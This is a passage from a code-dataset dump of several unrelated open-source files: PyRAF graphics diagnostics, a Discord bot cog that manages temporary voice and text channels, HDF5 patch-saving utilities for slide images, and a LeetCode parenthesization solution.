\"\"\"\n\n pyrver = 'unknown'\n try:\n from pyraf import __version__ as pyrver\n except ImportError:\n pass\n\n out = \"python exec = \" + str(sys.executable)\n if skip_volatiles:\n out += \"\\npython ver = \" + '.'.join(\n [str(v) for v in sys.version_info[0:2]])\n else:\n out += \"\\npython ver = \" + '.'.join(\n [str(v) for v in sys.version_info[0:3]])\n out += \"\\nplatform = \" + str(sys.platform)\n if not skip_volatiles:\n out += \"\\nPyRAF ver = \" + pyrver\n out += \"\\nc.OF_GRAPHICS = \" + str(capable.OF_GRAPHICS)\n dco = 'not yet known'\n if skip_volatiles:\n out += \"\\n/dev/console owner = \"\n else:\n dco = capable.get_dc_owner(False, True)\n out += \"\\n/dev/console owner = \" + str(dco)\n\n if not capable.OF_GRAPHICS:\n out += \"\\ntkinter use unattempted.\"\n else:\n import tkinter\n out += \"\\nTclVersion = \" + str(tkinter.TclVersion)\n out += \"\\nTkVersion = \" + str(tkinter.TkVersion)\n out += \"\\nWUTIL_ON_MAC = \" + str(WUTIL_ON_MAC)\n out += \"\\nWUTIL_ON_WIN = \" + str(WUTIL_ON_WIN)\n out += \"\\nWUTIL_USING_X = \" + str(WUTIL_USING_X)\n out += \"\\nis_darwin_and_x = \" + str(capable.is_darwin_and_x())\n if WUTIL_ON_MAC:\n out += \"\\nwhich_darwin_linkage = \" + str(\n capable.which_darwin_linkage())\n out += \"\\nwhich_darwin_linkage2 = \" + str(\n capable.which_darwin_linkage(force_otool_check=True))\n else:\n out += \"\\nwhich_darwin_linkage = (not darwin)\"\n out += \"\\nskip display = \" + str(_skipDisplay)\n out += \"\\nhas graphics = \" + str(hasGraphics)\n out += \"\\nimported aqutil = \" + str(bool(_has_aqutil))\n out += \"\\nimported xutil = \" + str(bool(_has_xutil))\n\n # Case of WUTIL_USING_X and not _has_xutil means either they don't have\n # xutil library installed, or they do but they can't draw to screen\n if WUTIL_USING_X and capable.OF_GRAPHICS and \\\n not _skipDisplay and not bool(_has_xutil):\n # quick debug help here for case where xutil didn't build\n out += '\\n\\tWARNING! PyRAF may be missing the \"xutil\" library. 
See PyRAF FAQ 1.9'\n if 'PYRAFGRAPHICS' in os.environ:\n val = os.environ['PYRAFGRAPHICS']\n out += \"\\nPYRAFGRAPHICS = \" + val\n if val == \"matplotlib\":\n mpl_ok = False\n try:\n import matplotlib as mpl\n mpl_ok = True\n except ImportError:\n out += \"\\nCannot import matplotlib\"\n if mpl_ok:\n if hasattr(mpl, 'tk_window_focus'):\n out += \"\\nmpl.tk_window_focus = \" + str(\n mpl.tk_window_focus())\n else:\n out += \"\\nmpl.tk_window_focus = function not supported\"\n mpldir = os.path.split(mpl.__file__)[0]\n import glob\n flist = glob.glob(mpldir + os.path.sep + 'backends' +\n os.path.sep + '*.so')\n flist = [os.path.split(f)[1] for f in flist]\n out += \"\\nmpl backends = \" + str(flist)\n tkaggbknd = mpldir + '/backends/_tkagg.so'\n if os.path.exists(tkaggbknd):\n out += \"\\ntry: /usr/bin/otool -L \" + tkaggbknd\n else:\n out += \"\\nPYRAFGRAPHICS not set\"\n\n if outstream:\n outstream.write(out + '\\n')\n else:\n print(out)\n\n\n# Finally, do we have access to a graphics display?\nhasGraphics = None\nif _skipDisplay:\n # A common _skipDisplay case is pyraf being imported in a script,\n # in which case we keep quiet about the lack of graphics.\n # But DO warn for interactive sessions where they didn't use '-s'\n if sys.argv[0].find('pyraf') >= 0 and \\\n '-s' not in sys.argv and '--silent' not in sys.argv:\n # Warn, but be specific about why\n if 'PYRAF_NO_DISPLAY' in os.environ:\n print(\"No graphics/display intended for this session.\")\n else:\n print(\"No graphics/display possible for this session.\")\nelse:\n if _has_xutil or _has_aqutil:\n hasGraphics = focusController.hasGraphics\n elif WUTIL_ON_MAC: # on a Mac but loaded no graphics libs (aqutil/xutil)\n # Handle case where we are on the Mac with no X and no PyObjc. We can\n # still run, albeit without automatic mouse moving and focus jumping.\n hasGraphics = focusController.hasGraphics\n if hasGraphics:\n if capable.which_darwin_linkage() == 'aqua':\n print(\n \"\\nLimited graphics available on OSX (aqutil not loaded)\\n\"\n )\n else:\n print(\n \"\\nLimited graphics available on OSX (xutil not loaded)\\n\"\n )\n elif WUTIL_ON_WIN:\n hasGraphics = 1 # try this, tho VERY limited (epar only I guess)\n print(\"\\nLimited graphics available on win32 platform\\n\")\n\n if not hasGraphics:\n print(\"\")\n print(\"No graphics display available for this session.\")\n print(\"Graphics tasks that attempt to plot to an interactive \"\n \"screen will fail.\")\n print('For help, search \"PyRAF FAQ 5.13\"')\n print(\"\")\n","repo_name":"iraf-community/pyraf","sub_path":"pyraf/wutil.py","file_name":"wutil.py","file_ext":"py","file_size_in_byte":22438,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"47"} +{"seq_id":"27452204287","text":"from typing import Union, Tuple, List, Dict\nimport random\nimport time\n\nimport discord\nfrom discord.ext import commands\n\nfrom environment import PREFIX, CHANNEL_TRACK_LIMIT\nimport database.db_models as db\nimport database.access_settings_db as settings_db\nimport database.access_channels_db as channels_db\nimport utils as utl\n\n\nasync def make_channel(voice_state: discord.VoiceState, member: discord.Member, bot_member: discord.Member,\n voice_overwrites: Dict[Union[discord.Member, discord.Role], discord.PermissionOverwrite],\n vc_name=\"voice-channel\", tc_name=\"text-channel\", channel_type=\"public\") -> Tuple[\n discord.VoiceChannel, discord.TextChannel]:\n \"\"\"\n Method to create a voice-channel with a linked text-channel, DB logging 
included\\n\n -> VCs created with this method are meant to be deleted later on, therefore they're logged to DB\n\n :param voice_state: To detect which VC the member is in\n :param member: To access guild and give member TC access permissions\n :param bot_member: Bot as member to enable access on all created channels\n :param voice_overwrites: To give member extra permissions in the VC and TC (bot permissions will be added / edited)\n :param vc_name: Voice Channel name\n :param tc_name: Text Channel name\n :param channel_type: For SQL-logging can be \"public\" or \"private\"\n\n :returns: Created Text and VoiceChannel Objects\n \"\"\"\n # TODO handle error on creation - especially admin permission errors\n # if ctx.me.guild_permissions.administrator...\n \n # add bot to voice channel overwrites to ensure that bot can mange the channel\n bot_overwrites: Union[discord.PermissionOverwrite, None] = voice_overwrites.get(bot_member, None)\n # check if some configurations for bot were made - update overwrites accordingly\n if bot_overwrites is not None:\n bot_overwrites.update(view_channel=True, connect=True)\n else:\n voice_overwrites[bot_member] = discord.PermissionOverwrite(view_channel=True, connect=True)\n\n # create channels\n v_channel: discord.VoiceChannel = await member.guild.create_voice_channel(\n vc_name, category=voice_state.channel.category, overwrites=voice_overwrites)\n\n t_channel: discord.TextChannel = await member.guild.create_text_channel(\n tc_name, category=voice_state.channel.category,\n overwrites={member: discord.PermissionOverwrite(view_channel=True),\n bot_member: discord.PermissionOverwrite(view_channel=True),\n member.guild.default_role: discord.PermissionOverwrite(view_channel=False)})\n\n # add channels to database\n channels_db.add_channel(v_channel.id, t_channel.id, member.guild.id, channel_type, v_channel.category.id)\n\n return v_channel, t_channel\n\n\ndef is_create_channel(guild: discord.Guild, channel: discord.VoiceChannel) -> bool:\n return True if settings_db.get_setting(guild.id, \"create_channel\", str(channel.id)) else False\n\n\ntc_sign_prefix = \"🔊-\" # shall be placed in {0} of text channel names, to highlight that channel is 'special'\nsign_public = \"â• \" # shall be placed in {1} of public channel names, to highlight that channel is 'public'\nsign_private = \"🔒\" # shall be placed in {1} of private channel names, to highlight that channel is 'private'\nchannel_names = {\"public_channel\": [\n # voice channel name, text channel name\n [\"{1}{0}'s discussion\", \"{0}-{1}'s discussion\"],\n [\"{1}{0}'s voice channel\", \"{0}-{1}'s text channel\"],\n [\"{1}{0}'s room\", \"{0}-{1}'s room\"],\n [\"{1}{0}'s open talk\", \"{0}-{1}'s open talk\"],\n [\"{1}{0}'s bar\", \"{0}-{1}'s bar\"],\n [\"{1}{0}'s public office\", \"{0}-{1}'s public office\"],\n [\"{1}{0}'s pool\", \"{0}-{1}'s pool\"],\n [\"{1}{0}'s bench\", \"{0}-{1}'s bench\"],\n [\"{1}{0}'s couch\", \"{0}-{1}'s couch\"],\n [\"{1}{0}'s channel\", \"{0}-{1}'s channel\"],\n ],\n\n \"private_channel\": [\n [\"{1}{0}'s private discussion\", \"{0}-{1}'s private discussion\"],\n [\"{1}{0}'s private fellowship\", \"{0}-{1}'s private fellowship\"],\n [\"{1}{0}'s private room\", \"{0}-{1}'s private room\"],\n [\"{1}{0}'s elite room\", \"{0}-{1}'s elite room\"],\n [\"{1}{0}'s regular table\", \"{0}-{1}'s regular table\"],\n [\"{1}{0}'s private haven\", \"{0}-{1}'s private haven\"],\n [\"{1}{0}'s private garden\", \"{0}-{1}'s private garden\"],\n ]\n }\n\n\nasync def create_new_channels(member: discord.Member,\n 
after: discord.VoiceState,\n channel_type: str,\n bot_member: discord.Member) -> Tuple[discord.VoiceChannel, discord.TextChannel]:\n \"\"\"\n :param member: member that issued the creation\n :param after: VoiceState that represents the state after the update\n :param channel_type: string that describes the type 'public_channel', 'private_channel'\n :param bot_member: needed to add bot itself to possibly hidden channel\n\n :returns: references to created voice and text channels\n \"\"\"\n\n # check if creator is allowed to rename a public channel\n allowed_to_edit = settings_db.get_first_setting_for(member.guild.id, \"allow_public_rename\")\n\n # get channel names from dict above\n new_channel_name = random.choice(channel_names[channel_type])\n\n # default overwrites for new channel\n voice_channel_permissions = after.channel.category.overwrites\n\n # overwriting permissions if channel shall be private\n is_private = channel_type == 'private_channel'\n if is_private:\n\n # prohibit everybody from joining except creator, give creator channel edit permissions\n voice_channel_permissions = {\n member.guild.default_role: discord.PermissionOverwrite(connect=False),\n member: discord.PermissionOverwrite(connect=True,\n manage_channels=True,\n manage_permissions=True)\n }\n\n # set extra permissions for creator if creators are allowed to edit public channels on this server\n elif allowed_to_edit and int(allowed_to_edit.value):\n voice_channel_permissions[member] = discord.PermissionOverwrite(connect=True,\n manage_channels=True)\n\n # add bot to channel so the bot can see and manage this channel without administrator\n voice_channel_permissions[bot_member] = discord.PermissionOverwrite(view_channel=True, connect=True)\n\n # issue creation of channels\n voice_channel, text_channel = await make_channel(after, member, bot_member, voice_channel_permissions,\n vc_name=new_channel_name[0].format(\n member.display_name,\n sign_private if is_private else sign_public),\n\n tc_name=new_channel_name[1].format(tc_sign_prefix,\n member.display_name),\n channel_type=channel_type)\n\n return voice_channel, text_channel\n\n\nasync def delete_text_channel(t_channel: discord.TextChannel, bot: commands.Bot,\n archive=None) -> Union[discord.TextChannel, None]:\n \"\"\"\n Checks whether channel shall be archived or deleted and executes that action\n\n Returns edited channel or None if channel was deleted\n \"\"\"\n\n async def is_message_in_channel():\n \"\"\" Check if there is more than the bots tutorial message in the channel \"\"\"\n\n # get enough messages to check\n messages: List[discord.Message] = await t_channel.history(limit=2).flatten()\n\n # channel is empty\n if len(messages) == 0:\n return False\n\n # only this bot has sent a message - probably the tutorial text -> assume empty\n elif len(messages) == 1 and messages[0].author.id == bot.user.id:\n return False\n\n return True\n\n # if archive is given and channel is not empty: move to archive\n if archive and await is_message_in_channel():\n\n await t_channel.edit(category=archive,\n reason=\"Connected voice channel is empty, archive channel with messages\",\n overwrites=archive.overwrites)\n return t_channel\n\n # delete channel\n await t_channel.delete(reason=\"Channel is empty and not needed anymore\")\n return None\n\n\nasync def clean_after_exception(voice_channel: discord.VoiceChannel, text_channel: discord.TextChannel,\n bot: commands.Bot,\n archive=None, log_channel=None):\n \"\"\" Cleanup routine that handles the deletion / activation of a voice- 
and text-channel\"\"\"\n    await voice_channel.delete(reason=\"An error occurred - user most likely left the channel during the process\")\n    await delete_text_channel(text_channel, bot, archive=archive)\n    if log_channel:\n        await log_channel.send(\n            embed=utl.make_embed(\n                name=\"Warning\",\n                value=\"An error occurred - the user most likely left the voice channel while the channels were being set up.\\n\"\n                      \"Cleanup finished.\",\n                color=utl.orange\n            )\n        )\n\n\ndef generate_text_channel_overwrite(\n        voice_channel: discord.VoiceChannel,\n        bot_member: discord.Member) -> Dict[Union[discord.Role, discord.Member], discord.PermissionOverwrite]:\n    \"\"\"\n    Generates overwrites for linked text-channels\\n\n    Gives read/write permission to:\\n\n    - roles that are registered as allowed in the settings\n    - members that are currently in the voice channel\n    - the bot member creating that channel\n\n    Prohibits the guild's default role from accessing the channel\n\n    :param voice_channel: parent voice channel to create text channel overwrites for\n    :param bot_member: needed to add bot itself to hidden channel\n\n    :returns: overwrites dictionary ready to apply\n    \"\"\"\n\n    guild: discord.Guild = voice_channel.guild\n\n    # get roles that have permissions to see all private TCs - like mods or bots\n    allowed_roles: List[db.Settings] = settings_db.get_all_settings_for(guild.id, \"view_tc_role\")\n\n    # roles that are allowed to see and write in channel by default\n    role_overwrites = {\n        guild.get_role(int(r.value)): discord.PermissionOverwrite(view_channel=True, send_messages=True)\n        for r in allowed_roles} if allowed_roles else {}\n\n    # exclude default role to make channel private\n    role_overwrites[guild.default_role] = discord.PermissionOverwrite(view_channel=False)\n\n    # overwrites that contain permissions for all members currently in the voice channel\n    member_overwrites = {\n        m: discord.PermissionOverwrite(view_channel=True, send_messages=True) for m in voice_channel.members\n    }\n\n    # add bot user self to channel, so bot can access the channel at any time\n    member_overwrites[bot_member] = discord.PermissionOverwrite(view_channel=True, send_messages=True)\n\n    # return joined dicts\n    return {**role_overwrites, **member_overwrites}\n\n\nasync def update_channel_overwrites(after_channel: discord.VoiceChannel,\n                                    created_channel: db.CreatedChannels, bot_member: discord.Member):\n    # get new overwrites for text channel\n    overwrites = generate_text_channel_overwrite(after_channel, bot_member)\n    # get linked text channel\n    linked_channel: discord.TextChannel = after_channel.guild.get_channel(created_channel.text_channel_id)\n    # TODO: logging if text channel does not exist\n    if linked_channel:\n        await linked_channel.edit(overwrites=overwrites)\n\n\nasync def send_welcome_message(text_channel: discord.TextChannel, linked_vc: discord.VoiceChannel):\n    await text_channel.send(\n        embed=utl.make_embed(\n            name='Welcome to your own private channel!',\n            value=f'Hey, this channel is only visible for people that are in your voice chat:\\n'\n                  f'{linked_vc.mention}\\n'\n                  \"You can use this channel to share conversation related stuff, \"\n                  \"use bot commands or just for other things.\\n\"\n                  'Have fun!',\n            footer='Please note that this channel will be removed '\n                   'when everyone has left the affiliated voice channel.',\n            color=utl.green\n        )\n    )
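\n\n\n# Shape of the mapping returned by generate_text_channel_overwrite (illustrative\n# sketch only; the role/member names below are placeholders, not part of this cog):\n#   {moderator_role:     discord.PermissionOverwrite(view_channel=True, send_messages=True),\n#    guild.default_role: discord.PermissionOverwrite(view_channel=False),\n#    member_in_vc:       discord.PermissionOverwrite(view_channel=True, send_messages=True),\n#    bot_member:         discord.PermissionOverwrite(view_channel=True, send_messages=True)}\n\n\nclass VCCreator(commands.Cog):\n    # Codename: PANTHEON\n    \"\"\"\n    A function that creates custom voice channels if triggered\n    - Creates a dedicated voice-channel\n    - Creates a private linked text-channel\n    - Members will be 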
added and removed to text-channel\n - There is an option for a customizable /private voice-channel\n \"\"\"\n\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_voice_state_update(self, member: discord.Member, before: discord.VoiceState,\n after: discord.VoiceState):\n\n # this is the case that a state update happens that is not a channel switch, but a mute or something like that\n if before.channel and after.channel and before.channel.id == after.channel.id:\n return\n\n # as shorthand - we'll need this a few times\n guild: discord.Guild = member.guild\n bot_member_on_guild: discord.Member = guild.get_member(self.bot.user.id)\n after_channel: Union[discord.VoiceChannel, None] = after.channel\n before_channel: Union[discord.VoiceChannel, None] = before.channel\n\n # open db session\n session = db.open_session()\n\n # get settings for archive and log channel\n log_entry = settings_db.get_first_setting_for(guild.id, \"log_channel\", session) # get entry if exists\n archive_entry = settings_db.get_first_setting_for(guild.id, \"archive_category\", session)\n\n # get channels from entries if existing\n log_channel: Union[discord.TextChannel, None] = guild.get_channel(int(log_entry.value)) if log_entry else None\n archive_category: Union[discord.CategoryChannel, None] = guild.get_channel(\n int(archive_entry.value)) if archive_entry else None\n\n # check if member has a voice channel after the state update\n # could trigger the creation of a new channel or require an update for an existing one\n if after_channel:\n\n # check db if channel is a channel that was created by the bot\n created_channel: Union[db.CreatedChannels, None] = channels_db.get_voice_channel_by_id(after_channel.id, session)\n\n # check if joined (after) channel is a channel that triggers a channel creation\n tracked_channel = settings_db.get_setting_by_value(guild.id, after_channel.id, session)\n\n if tracked_channel:\n voice_channel, text_channel = await create_new_channels(member, after,\n tracked_channel.setting, bot_member_on_guild)\n\n # write to log channel if configured\n if log_entry:\n await log_channel.send(\n embed=utl.make_embed(\n name=\"Created voice channel\",\n value=f\"{member.mention} created `{voice_channel.name if voice_channel else '`deleted`'}` \"\n f\"with {text_channel.mention if text_channel else '`deleted`'}\",\n color=utl.green\n )\n )\n\n # moving creator to created channel\n try:\n await member.move_to(voice_channel, reason=f'{member} issued creation')\n await send_welcome_message(text_channel, voice_channel) # send message explaining text channel\n \n # if user already left already\n except discord.HTTPException as e:\n print(\"Handle HTTP exception during creation of channels - channel was already empty\")\n await clean_after_exception(voice_channel, text_channel, self.bot,\n archive=archive_category, log_channel=log_channel)\n\n # channel is in our database - add user to linked text_channel\n elif created_channel:\n\n # static channels need a new linked text-channel if they were empty before\n if created_channel.internal_type == 'static_channel' and created_channel.text_channel_id is None:\n\n try:\n tc_overwrite = generate_text_channel_overwrite(after_channel, self.bot.user)\n text_channel = await guild.create_text_channel(f\"{tc_sign_prefix}{after_channel.name}\",\n overwrites=tc_overwrite,\n category=after_channel.category,\n reason=\"User joined linked voice channel\")\n created_channel.text_channel_id = text_channel.id\n 
session.add(created_channel)\n                        session.flush()\n\n                        await send_welcome_message(text_channel, after_channel)  # send message explaining text channel\n\n                    except discord.HTTPException as e:\n                        # TODO: log this\n                        pass\n\n                # processing 'normal', existing linked channel\n                else:\n                    # update overwrites to add user to joined channel\n                    # TODO we can skip this API call when the creator just got moved\n                    await update_channel_overwrites(after_channel, created_channel, bot_member_on_guild)\n\n        if before_channel:\n\n            # check db if before channel is a channel that was created by the bot\n            created_channel: Union[db.CreatedChannels, None] = channels_db.get_voice_channel_by_id(before_channel.id, session)\n\n            if created_channel:\n                # member left but there are still members in vc\n                if before_channel.members:\n                    # remove user from left linked channel\n                    await update_channel_overwrites(before_channel, created_channel, bot_member_on_guild)\n\n                # left channel is now empty\n                else:\n                    # fetch needed information\n                    before_channel_id: int = before_channel.id  # extract id before deleting, needed for db deletion\n                    text_channel: Union[discord.TextChannel, None] = guild.get_channel(created_channel.text_channel_id)\n\n                    # delete channels - catch AttributeErrors to still do the db access and the logging\n\n                    # delete VC only if it's not a static_channel\n                    if created_channel.internal_type != 'static_channel':\n                        try:\n                            await before_channel.delete(reason=\"Channel is empty\")\n                        except AttributeError:\n                            pass\n\n                    # archive or delete linked text channel\n                    try:\n                        archived_channel = await delete_text_channel(text_channel, self.bot, archive=archive_category)\n\n                    except AttributeError:\n                        archived_channel = None\n\n                    except discord.errors.HTTPException:\n                        # occurs when the category that the channel shall be moved to is full\n                        archived_channel = None\n                        if log_channel:\n                            await log_channel.send(\n                                embed=utl.make_embed(\n                                    name=\"ERROR handling linked text channel\",\n                                    value=f\"This error probably means that the archive `{archive_category.mention}` is full.\\n\"\n                                          \"Please check the category and either set a new one or delete older channels.\\n\"\n                                          \"The text channel was not deleted.\",\n                                    color=utl.red))\n\n                    if log_channel:\n                        static = created_channel.internal_type == 'static_channel'  # helper variable\n\n                        await log_channel.send(\n                            embed=utl.make_embed(\n                                name=f\"Removed {text_channel.name}\" if static else f\"Deleted {before_channel.name}\",\n                                value=f\"{text_channel.mention} was linked to {before_channel.name} and is \" if static\n                                else f\"The linked text channel {text_channel.mention} is \"\n                                     f\"{'moved to archive' if archived_channel is not None and archive_category else 'deleted'}\",\n                                color=utl.green\n                            )\n                        )\n\n                    if created_channel.internal_type == 'static_channel':\n                        # remove reference to now archived channel\n                        created_channel.text_channel_id = None\n                        session.add(created_channel)\n                        session.flush()\n\n                    else:\n                        # remove deleted channel from database\n                        channels_db.del_channel(before_channel_id)\n\n        session.commit()\n        session.close()\n\n\ndef setup(bot):\n    bot.add_cog(VCCreator(bot))\n","repo_name":"nonchris/discord-fury","sub_path":"src/cogs/on_voice_update.py","file_name":"on_voice_update.py","file_ext":"py","file_size_in_byte":22241,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"47"}
{"seq_id":"11446475638","text":"\"\"\"\nContains the helper functions for creating h5 files\n\"\"\"\n\nimport h5py\nimport numpy as np\nimport os\nimport pandas as pd\n\n##########################\n# 3D preprocessing utils 
#\n##########################\ndef savePatchIter_bag_hdf5_3D(patch):\n \"\"\"\n Save patch iteratively to hdf5.\n Assumes initialize_hdf5_bag_3D has been run before\n \"\"\"\n x = patch['x']\n y = patch['y']\n z = patch['z']\n\n name = patch['name']\n img_patch = patch['patch']\n save_path = patch['save_path']\n\n # img_patch: list of (w, h)\n img_patch = img_patch[np.newaxis, ...] # (z, w, h) -> (-1, z, w, h)\n img_shape = img_patch.shape # (-1, z, w, h)\n\n file_path = os.path.join(save_path, name) + '_patches.h5'\n file = h5py.File(file_path, \"a\")\n\n dset = file['imgs']\n dset.resize(len(dset) + img_shape[0], axis=0)\n dset[-img_shape[0]:] = img_patch\n\n coord_dset = file['coords']\n coord_dset.resize(len(coord_dset) + img_shape[0], axis=0)\n coord_dset[-img_shape[0]:] = (z, x, y)\n\n file.close()\n\n\ndef initialize_hdf5_bag_3D(patch, z_level_start):\n \"\"\"\n Initialize hdf5. Contains three datasets - imgs, coords, z_level\n\n imgs: holder for patches (numOfpatches, z , w, h)\n coords: Holder for top-left corner of each patch (Tuple of three element)\n z_level: indicates the z-level of the corresponding patch\n \"\"\"\n x = patch['x']\n y = patch['y']\n z = patch['z']\n\n name = patch['name']\n patch_level = patch['patch_level']\n downsample = patch['downsample']\n downsampled_level_dim = patch['downsampled_level_dim']\n level_dim = patch['level_dim']\n img_patch = patch['patch']\n save_path = patch['save_path']\n resolution = patch['resolution']\n\n file_path = os.path.join(save_path, name) + '_patches.h5'\n file = h5py.File(file_path, \"w\")\n\n # img_patch: list of (w, h)\n img_patch = img_patch[np.newaxis, ...] # (z, w, h) -> (-1, z, w, h)\n\n dtype = img_patch.dtype\n\n # Initialize a resizable dataset to hold the output\n img_shape = img_patch.shape # (-1, z, w, h)\n\n # maximum dimensions up to which dataset maybe resized (None means unlimited)\n # First dim: number of patches in each slice\n maxshape = (None,) + img_shape[1:]\n dset = file.create_dataset('imgs',\n shape=img_shape,\n maxshape=maxshape,\n dtype=dtype)\n\n dset[:] = img_patch\n\n # Attributes\n dset.attrs['patch_level'] = patch_level\n dset.attrs['wsi_name'] = name\n dset.attrs['downsample'] = downsample\n dset.attrs['level_dim'] = level_dim\n dset.attrs['downsampled_level_dim'] = downsampled_level_dim\n dset.attrs['resolution'] = resolution\n\n coord_dset = file.create_dataset('coords',\n shape=(1, 3),\n maxshape=(None, 3),\n dtype=np.int32)\n\n coord_dset[:] = (z, x, y)\n coord_dset.attrs['z_level_start'] = z_level_start\n\n file.close()\n\n\n###########################\n# H&E preprocessing utils #\n###########################\ndef savePatchIter_bag_hdf5(patch):\n \"\"\"\n Save patch iteratively to hdf5\n \"\"\"\n x, y, cont_idx, patch_level, downsample, downsampled_level_dim, level_dim, img_patch, name, save_path = tuple(\n patch.values())\n img_patch = np.array(img_patch)[np.newaxis, ...]\n img_shape = img_patch.shape\n\n file_path = os.path.join(save_path, name) + '.h5'\n file = h5py.File(file_path, \"a\")\n\n dset = file['imgs']\n dset.resize(len(dset) + img_shape[0], axis=0)\n dset[-img_shape[0]:] = img_patch\n\n if 'coords' in file:\n coord_dset = file['coords']\n coord_dset.resize(len(coord_dset) + img_shape[0], axis=0)\n coord_dset[-img_shape[0]:] = (x, y)\n\n file.close()\n\n\ndef initialize_hdf5_bag(first_patch, save_coord=False):\n x, y, cont_idx, patch_level, downsample, downsampled_level_dim, level_dim, img_patch, name, save_path = tuple(\n first_patch.values())\n file_path = 
os.path.join(save_path, name) + '.h5'\n    file = h5py.File(file_path, \"w\")\n    img_patch = np.array(img_patch)[np.newaxis, ...]\n    dtype = img_patch.dtype\n\n    # Initialize a resizable dataset to hold the output\n    img_shape = img_patch.shape\n    maxshape = (None,) + img_shape[1:]  # maximum dimensions up to which dataset may be resized (None means unlimited)\n    dset = file.create_dataset('imgs',\n                               shape=img_shape, maxshape=maxshape, chunks=img_shape, dtype=dtype)\n\n    dset[:] = img_patch\n    dset.attrs['patch_level'] = patch_level\n    dset.attrs['wsi_name'] = name\n    dset.attrs['downsample'] = downsample\n    dset.attrs['level_dim'] = level_dim\n    dset.attrs['downsampled_level_dim'] = downsampled_level_dim\n\n    if save_coord:\n        coord_dset = file.create_dataset('coords', shape=(1, 2), maxshape=(None, 2), chunks=(1, 2), dtype=np.int32)\n        coord_dset[:] = (x, y)\n\n    file.close()\n    return file_path\n\n\ndef screen_coords(scores, coords, top_left, bot_right):\n    \"\"\"\n    Filter coordinates/scores within the bounding box\n    \"\"\"\n    bot_right = np.array(bot_right)\n    top_left = np.array(top_left)\n    mask = np.logical_and(np.all(coords >= top_left, axis=1), np.all(coords <= bot_right, axis=1))\n    scores = scores[mask]\n    coords = coords[mask]\n    return scores, coords\n\n\ndef to_percentiles(scores):\n    from scipy.stats import rankdata\n    scores = rankdata(scores, 'average')/len(scores) * 100\n    return scores\n\n\ndef initialize_df(slides, seg_params, filter_params, vis_params, patch_params, img_params):\n    \"\"\"\n    Initialize dataframe with relevant parameters\n    \"\"\"\n    total = len(slides)\n    df = pd.DataFrame({'slide_id': slides, 'process': np.full((total), 1, dtype=np.uint8),\n                       'status': np.full((total), 'tbp'),\n\n                       ## seg params\n                       # Level at which to segment (Not yet used for 3D)\n                       'seg_level': np.full((total), int(seg_params['seg_level']), dtype=np.int8),\n                       # Threshold for binarization\n                       'sthresh': np.full((total), int(seg_params['sthresh']), dtype=np.uint8),\n                       # Median filtering radius (Too low of a value will result in squiggly contours)\n                       'mthresh': np.full((total), int(seg_params['mthresh']), dtype=np.uint8),\n                       'close': np.full((total), int(seg_params['close']), dtype=np.uint32),\n                       'use_otsu': np.full((total), bool(seg_params['use_otsu']), dtype=bool),\n\n                       ## filter params\n                       # threshold for area of tissue (multiplier - will be multiplied by reference patch size)\n                       'a_t': np.full((total), int(filter_params['a_t']), dtype=np.uint32),\n                       # threshold for area of hole (multiplier - will be multiplied by reference patch size)\n                       'a_h': np.full((total), int(filter_params['a_h']), dtype=np.uint32),\n                       # maximum number of holes\n                       'max_n_holes': np.full((total), int(filter_params['max_n_holes']), dtype=np.uint32),\n\n                       # vis params\n                       'vis_level': np.full((total), int(vis_params['vis_level']), dtype=np.int8),  # Not used\n                       'line_thickness': np.full((total), int(vis_params['line_thickness']), dtype=np.uint32),\n\n                       # patching params\n                       'use_padding': np.full((total), bool(patch_params['use_padding']), dtype=bool),\n                       'contour_fn': np.full((total), patch_params['contour_fn']),\n\n                       # img_params\n                       'black_thresh': np.full((total), img_params['black_thresh'], dtype=np.float32),\n                       'clip_min': np.full((total), img_params['clip_min'], dtype=np.uint32),\n                       'clip_max': np.full((total), img_params['clip_max'], dtype=np.uint32)\n                       })\n\n    return df\n
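\n# Minimal usage sketch for initialize_df (illustrative; the parameter values below\n# are placeholders, not the project defaults):\n# df = initialize_df(\n#     slides=['slide_001.svs'],\n#     seg_params={'seg_level': -1, 'sthresh': 8, 'mthresh': 7, 'close': 4, 'use_otsu': False},\n#     filter_params={'a_t': 100, 'a_h': 16, 'max_n_holes': 8},\n#     vis_params={'vis_level': -1, 'line_thickness': 250},\n#     patch_params={'use_padding': True, 'contour_fn': 'four_pt'},\n#     img_params={'black_thresh': 0.5, 'clip_min': 0, 'clip_max': 255})\n\n# def get_best_HE_patch_level(wsi, ref_res):\n#     \"\"\"\n#     Given the resolution for the reference modality (i.e., CT), find the best level to process WSI\n#\n#     Inputs\n#     ======\n#     wsi: OpenSlide object\n#     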
ref_res: float\n#         Resolution for the reference modality\n#     \"\"\"\n#     factor = ref_res / float(wsi.properties['openslide.mpp-x'])\n#     patch_level = wsi.get_best_level_for_downsample(factor)\n#\n#     return patch_level\n","repo_name":"mahmoodlab/mamba","sub_path":"preprocess/wsi_core/wsi_utils.py","file_name":"wsi_utils.py","file_ext":"py","file_size_in_byte":8067,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"47"}
{"seq_id":"16158782671","text":"from typing import List\n\n\nclass Solution:\n    def diffWaysToCompute(self, expression: str) -> List[int]:\n        # Divide and conquer: split the expression at every operator and\n        # combine every result from the left part with every result from the right.\n        res = []\n        for i in range(len(expression)):\n            c = expression[i]\n            if c in \"+-*\":\n                left = self.diffWaysToCompute(expression[:i])\n                right = self.diffWaysToCompute(expression[i + 1:])\n\n                for l in left:\n                    for r in right:\n                        if c == \"+\":\n                            res.append(l + r)\n                        if c == \"*\":\n                            res.append(l * r)\n                        if c == \"-\":\n                            res.append(l - r)\n\n        # Base case: no operator left, the whole expression is a single number\n        if len(res) == 0:\n            res.append(int(expression))\n\n        return res
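\n\n\n# Quick check (illustrative, not part of the original solution): \"2-1-1\" can be\n# parenthesized as (2-(1-1)) = 2 or ((2-1)-1) = 0.\nif __name__ == \"__main__\":\n    print(Solution().diffWaysToCompute(\"2-1-1\"))  # [2, 0]","repo_name":"snail15/AlgorithmPractice","sub_path":"LeetCode/Python/SecondRound/241_differentWaysToAddParentheses.py","file_name":"241_differentWaysToAddParentheses.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
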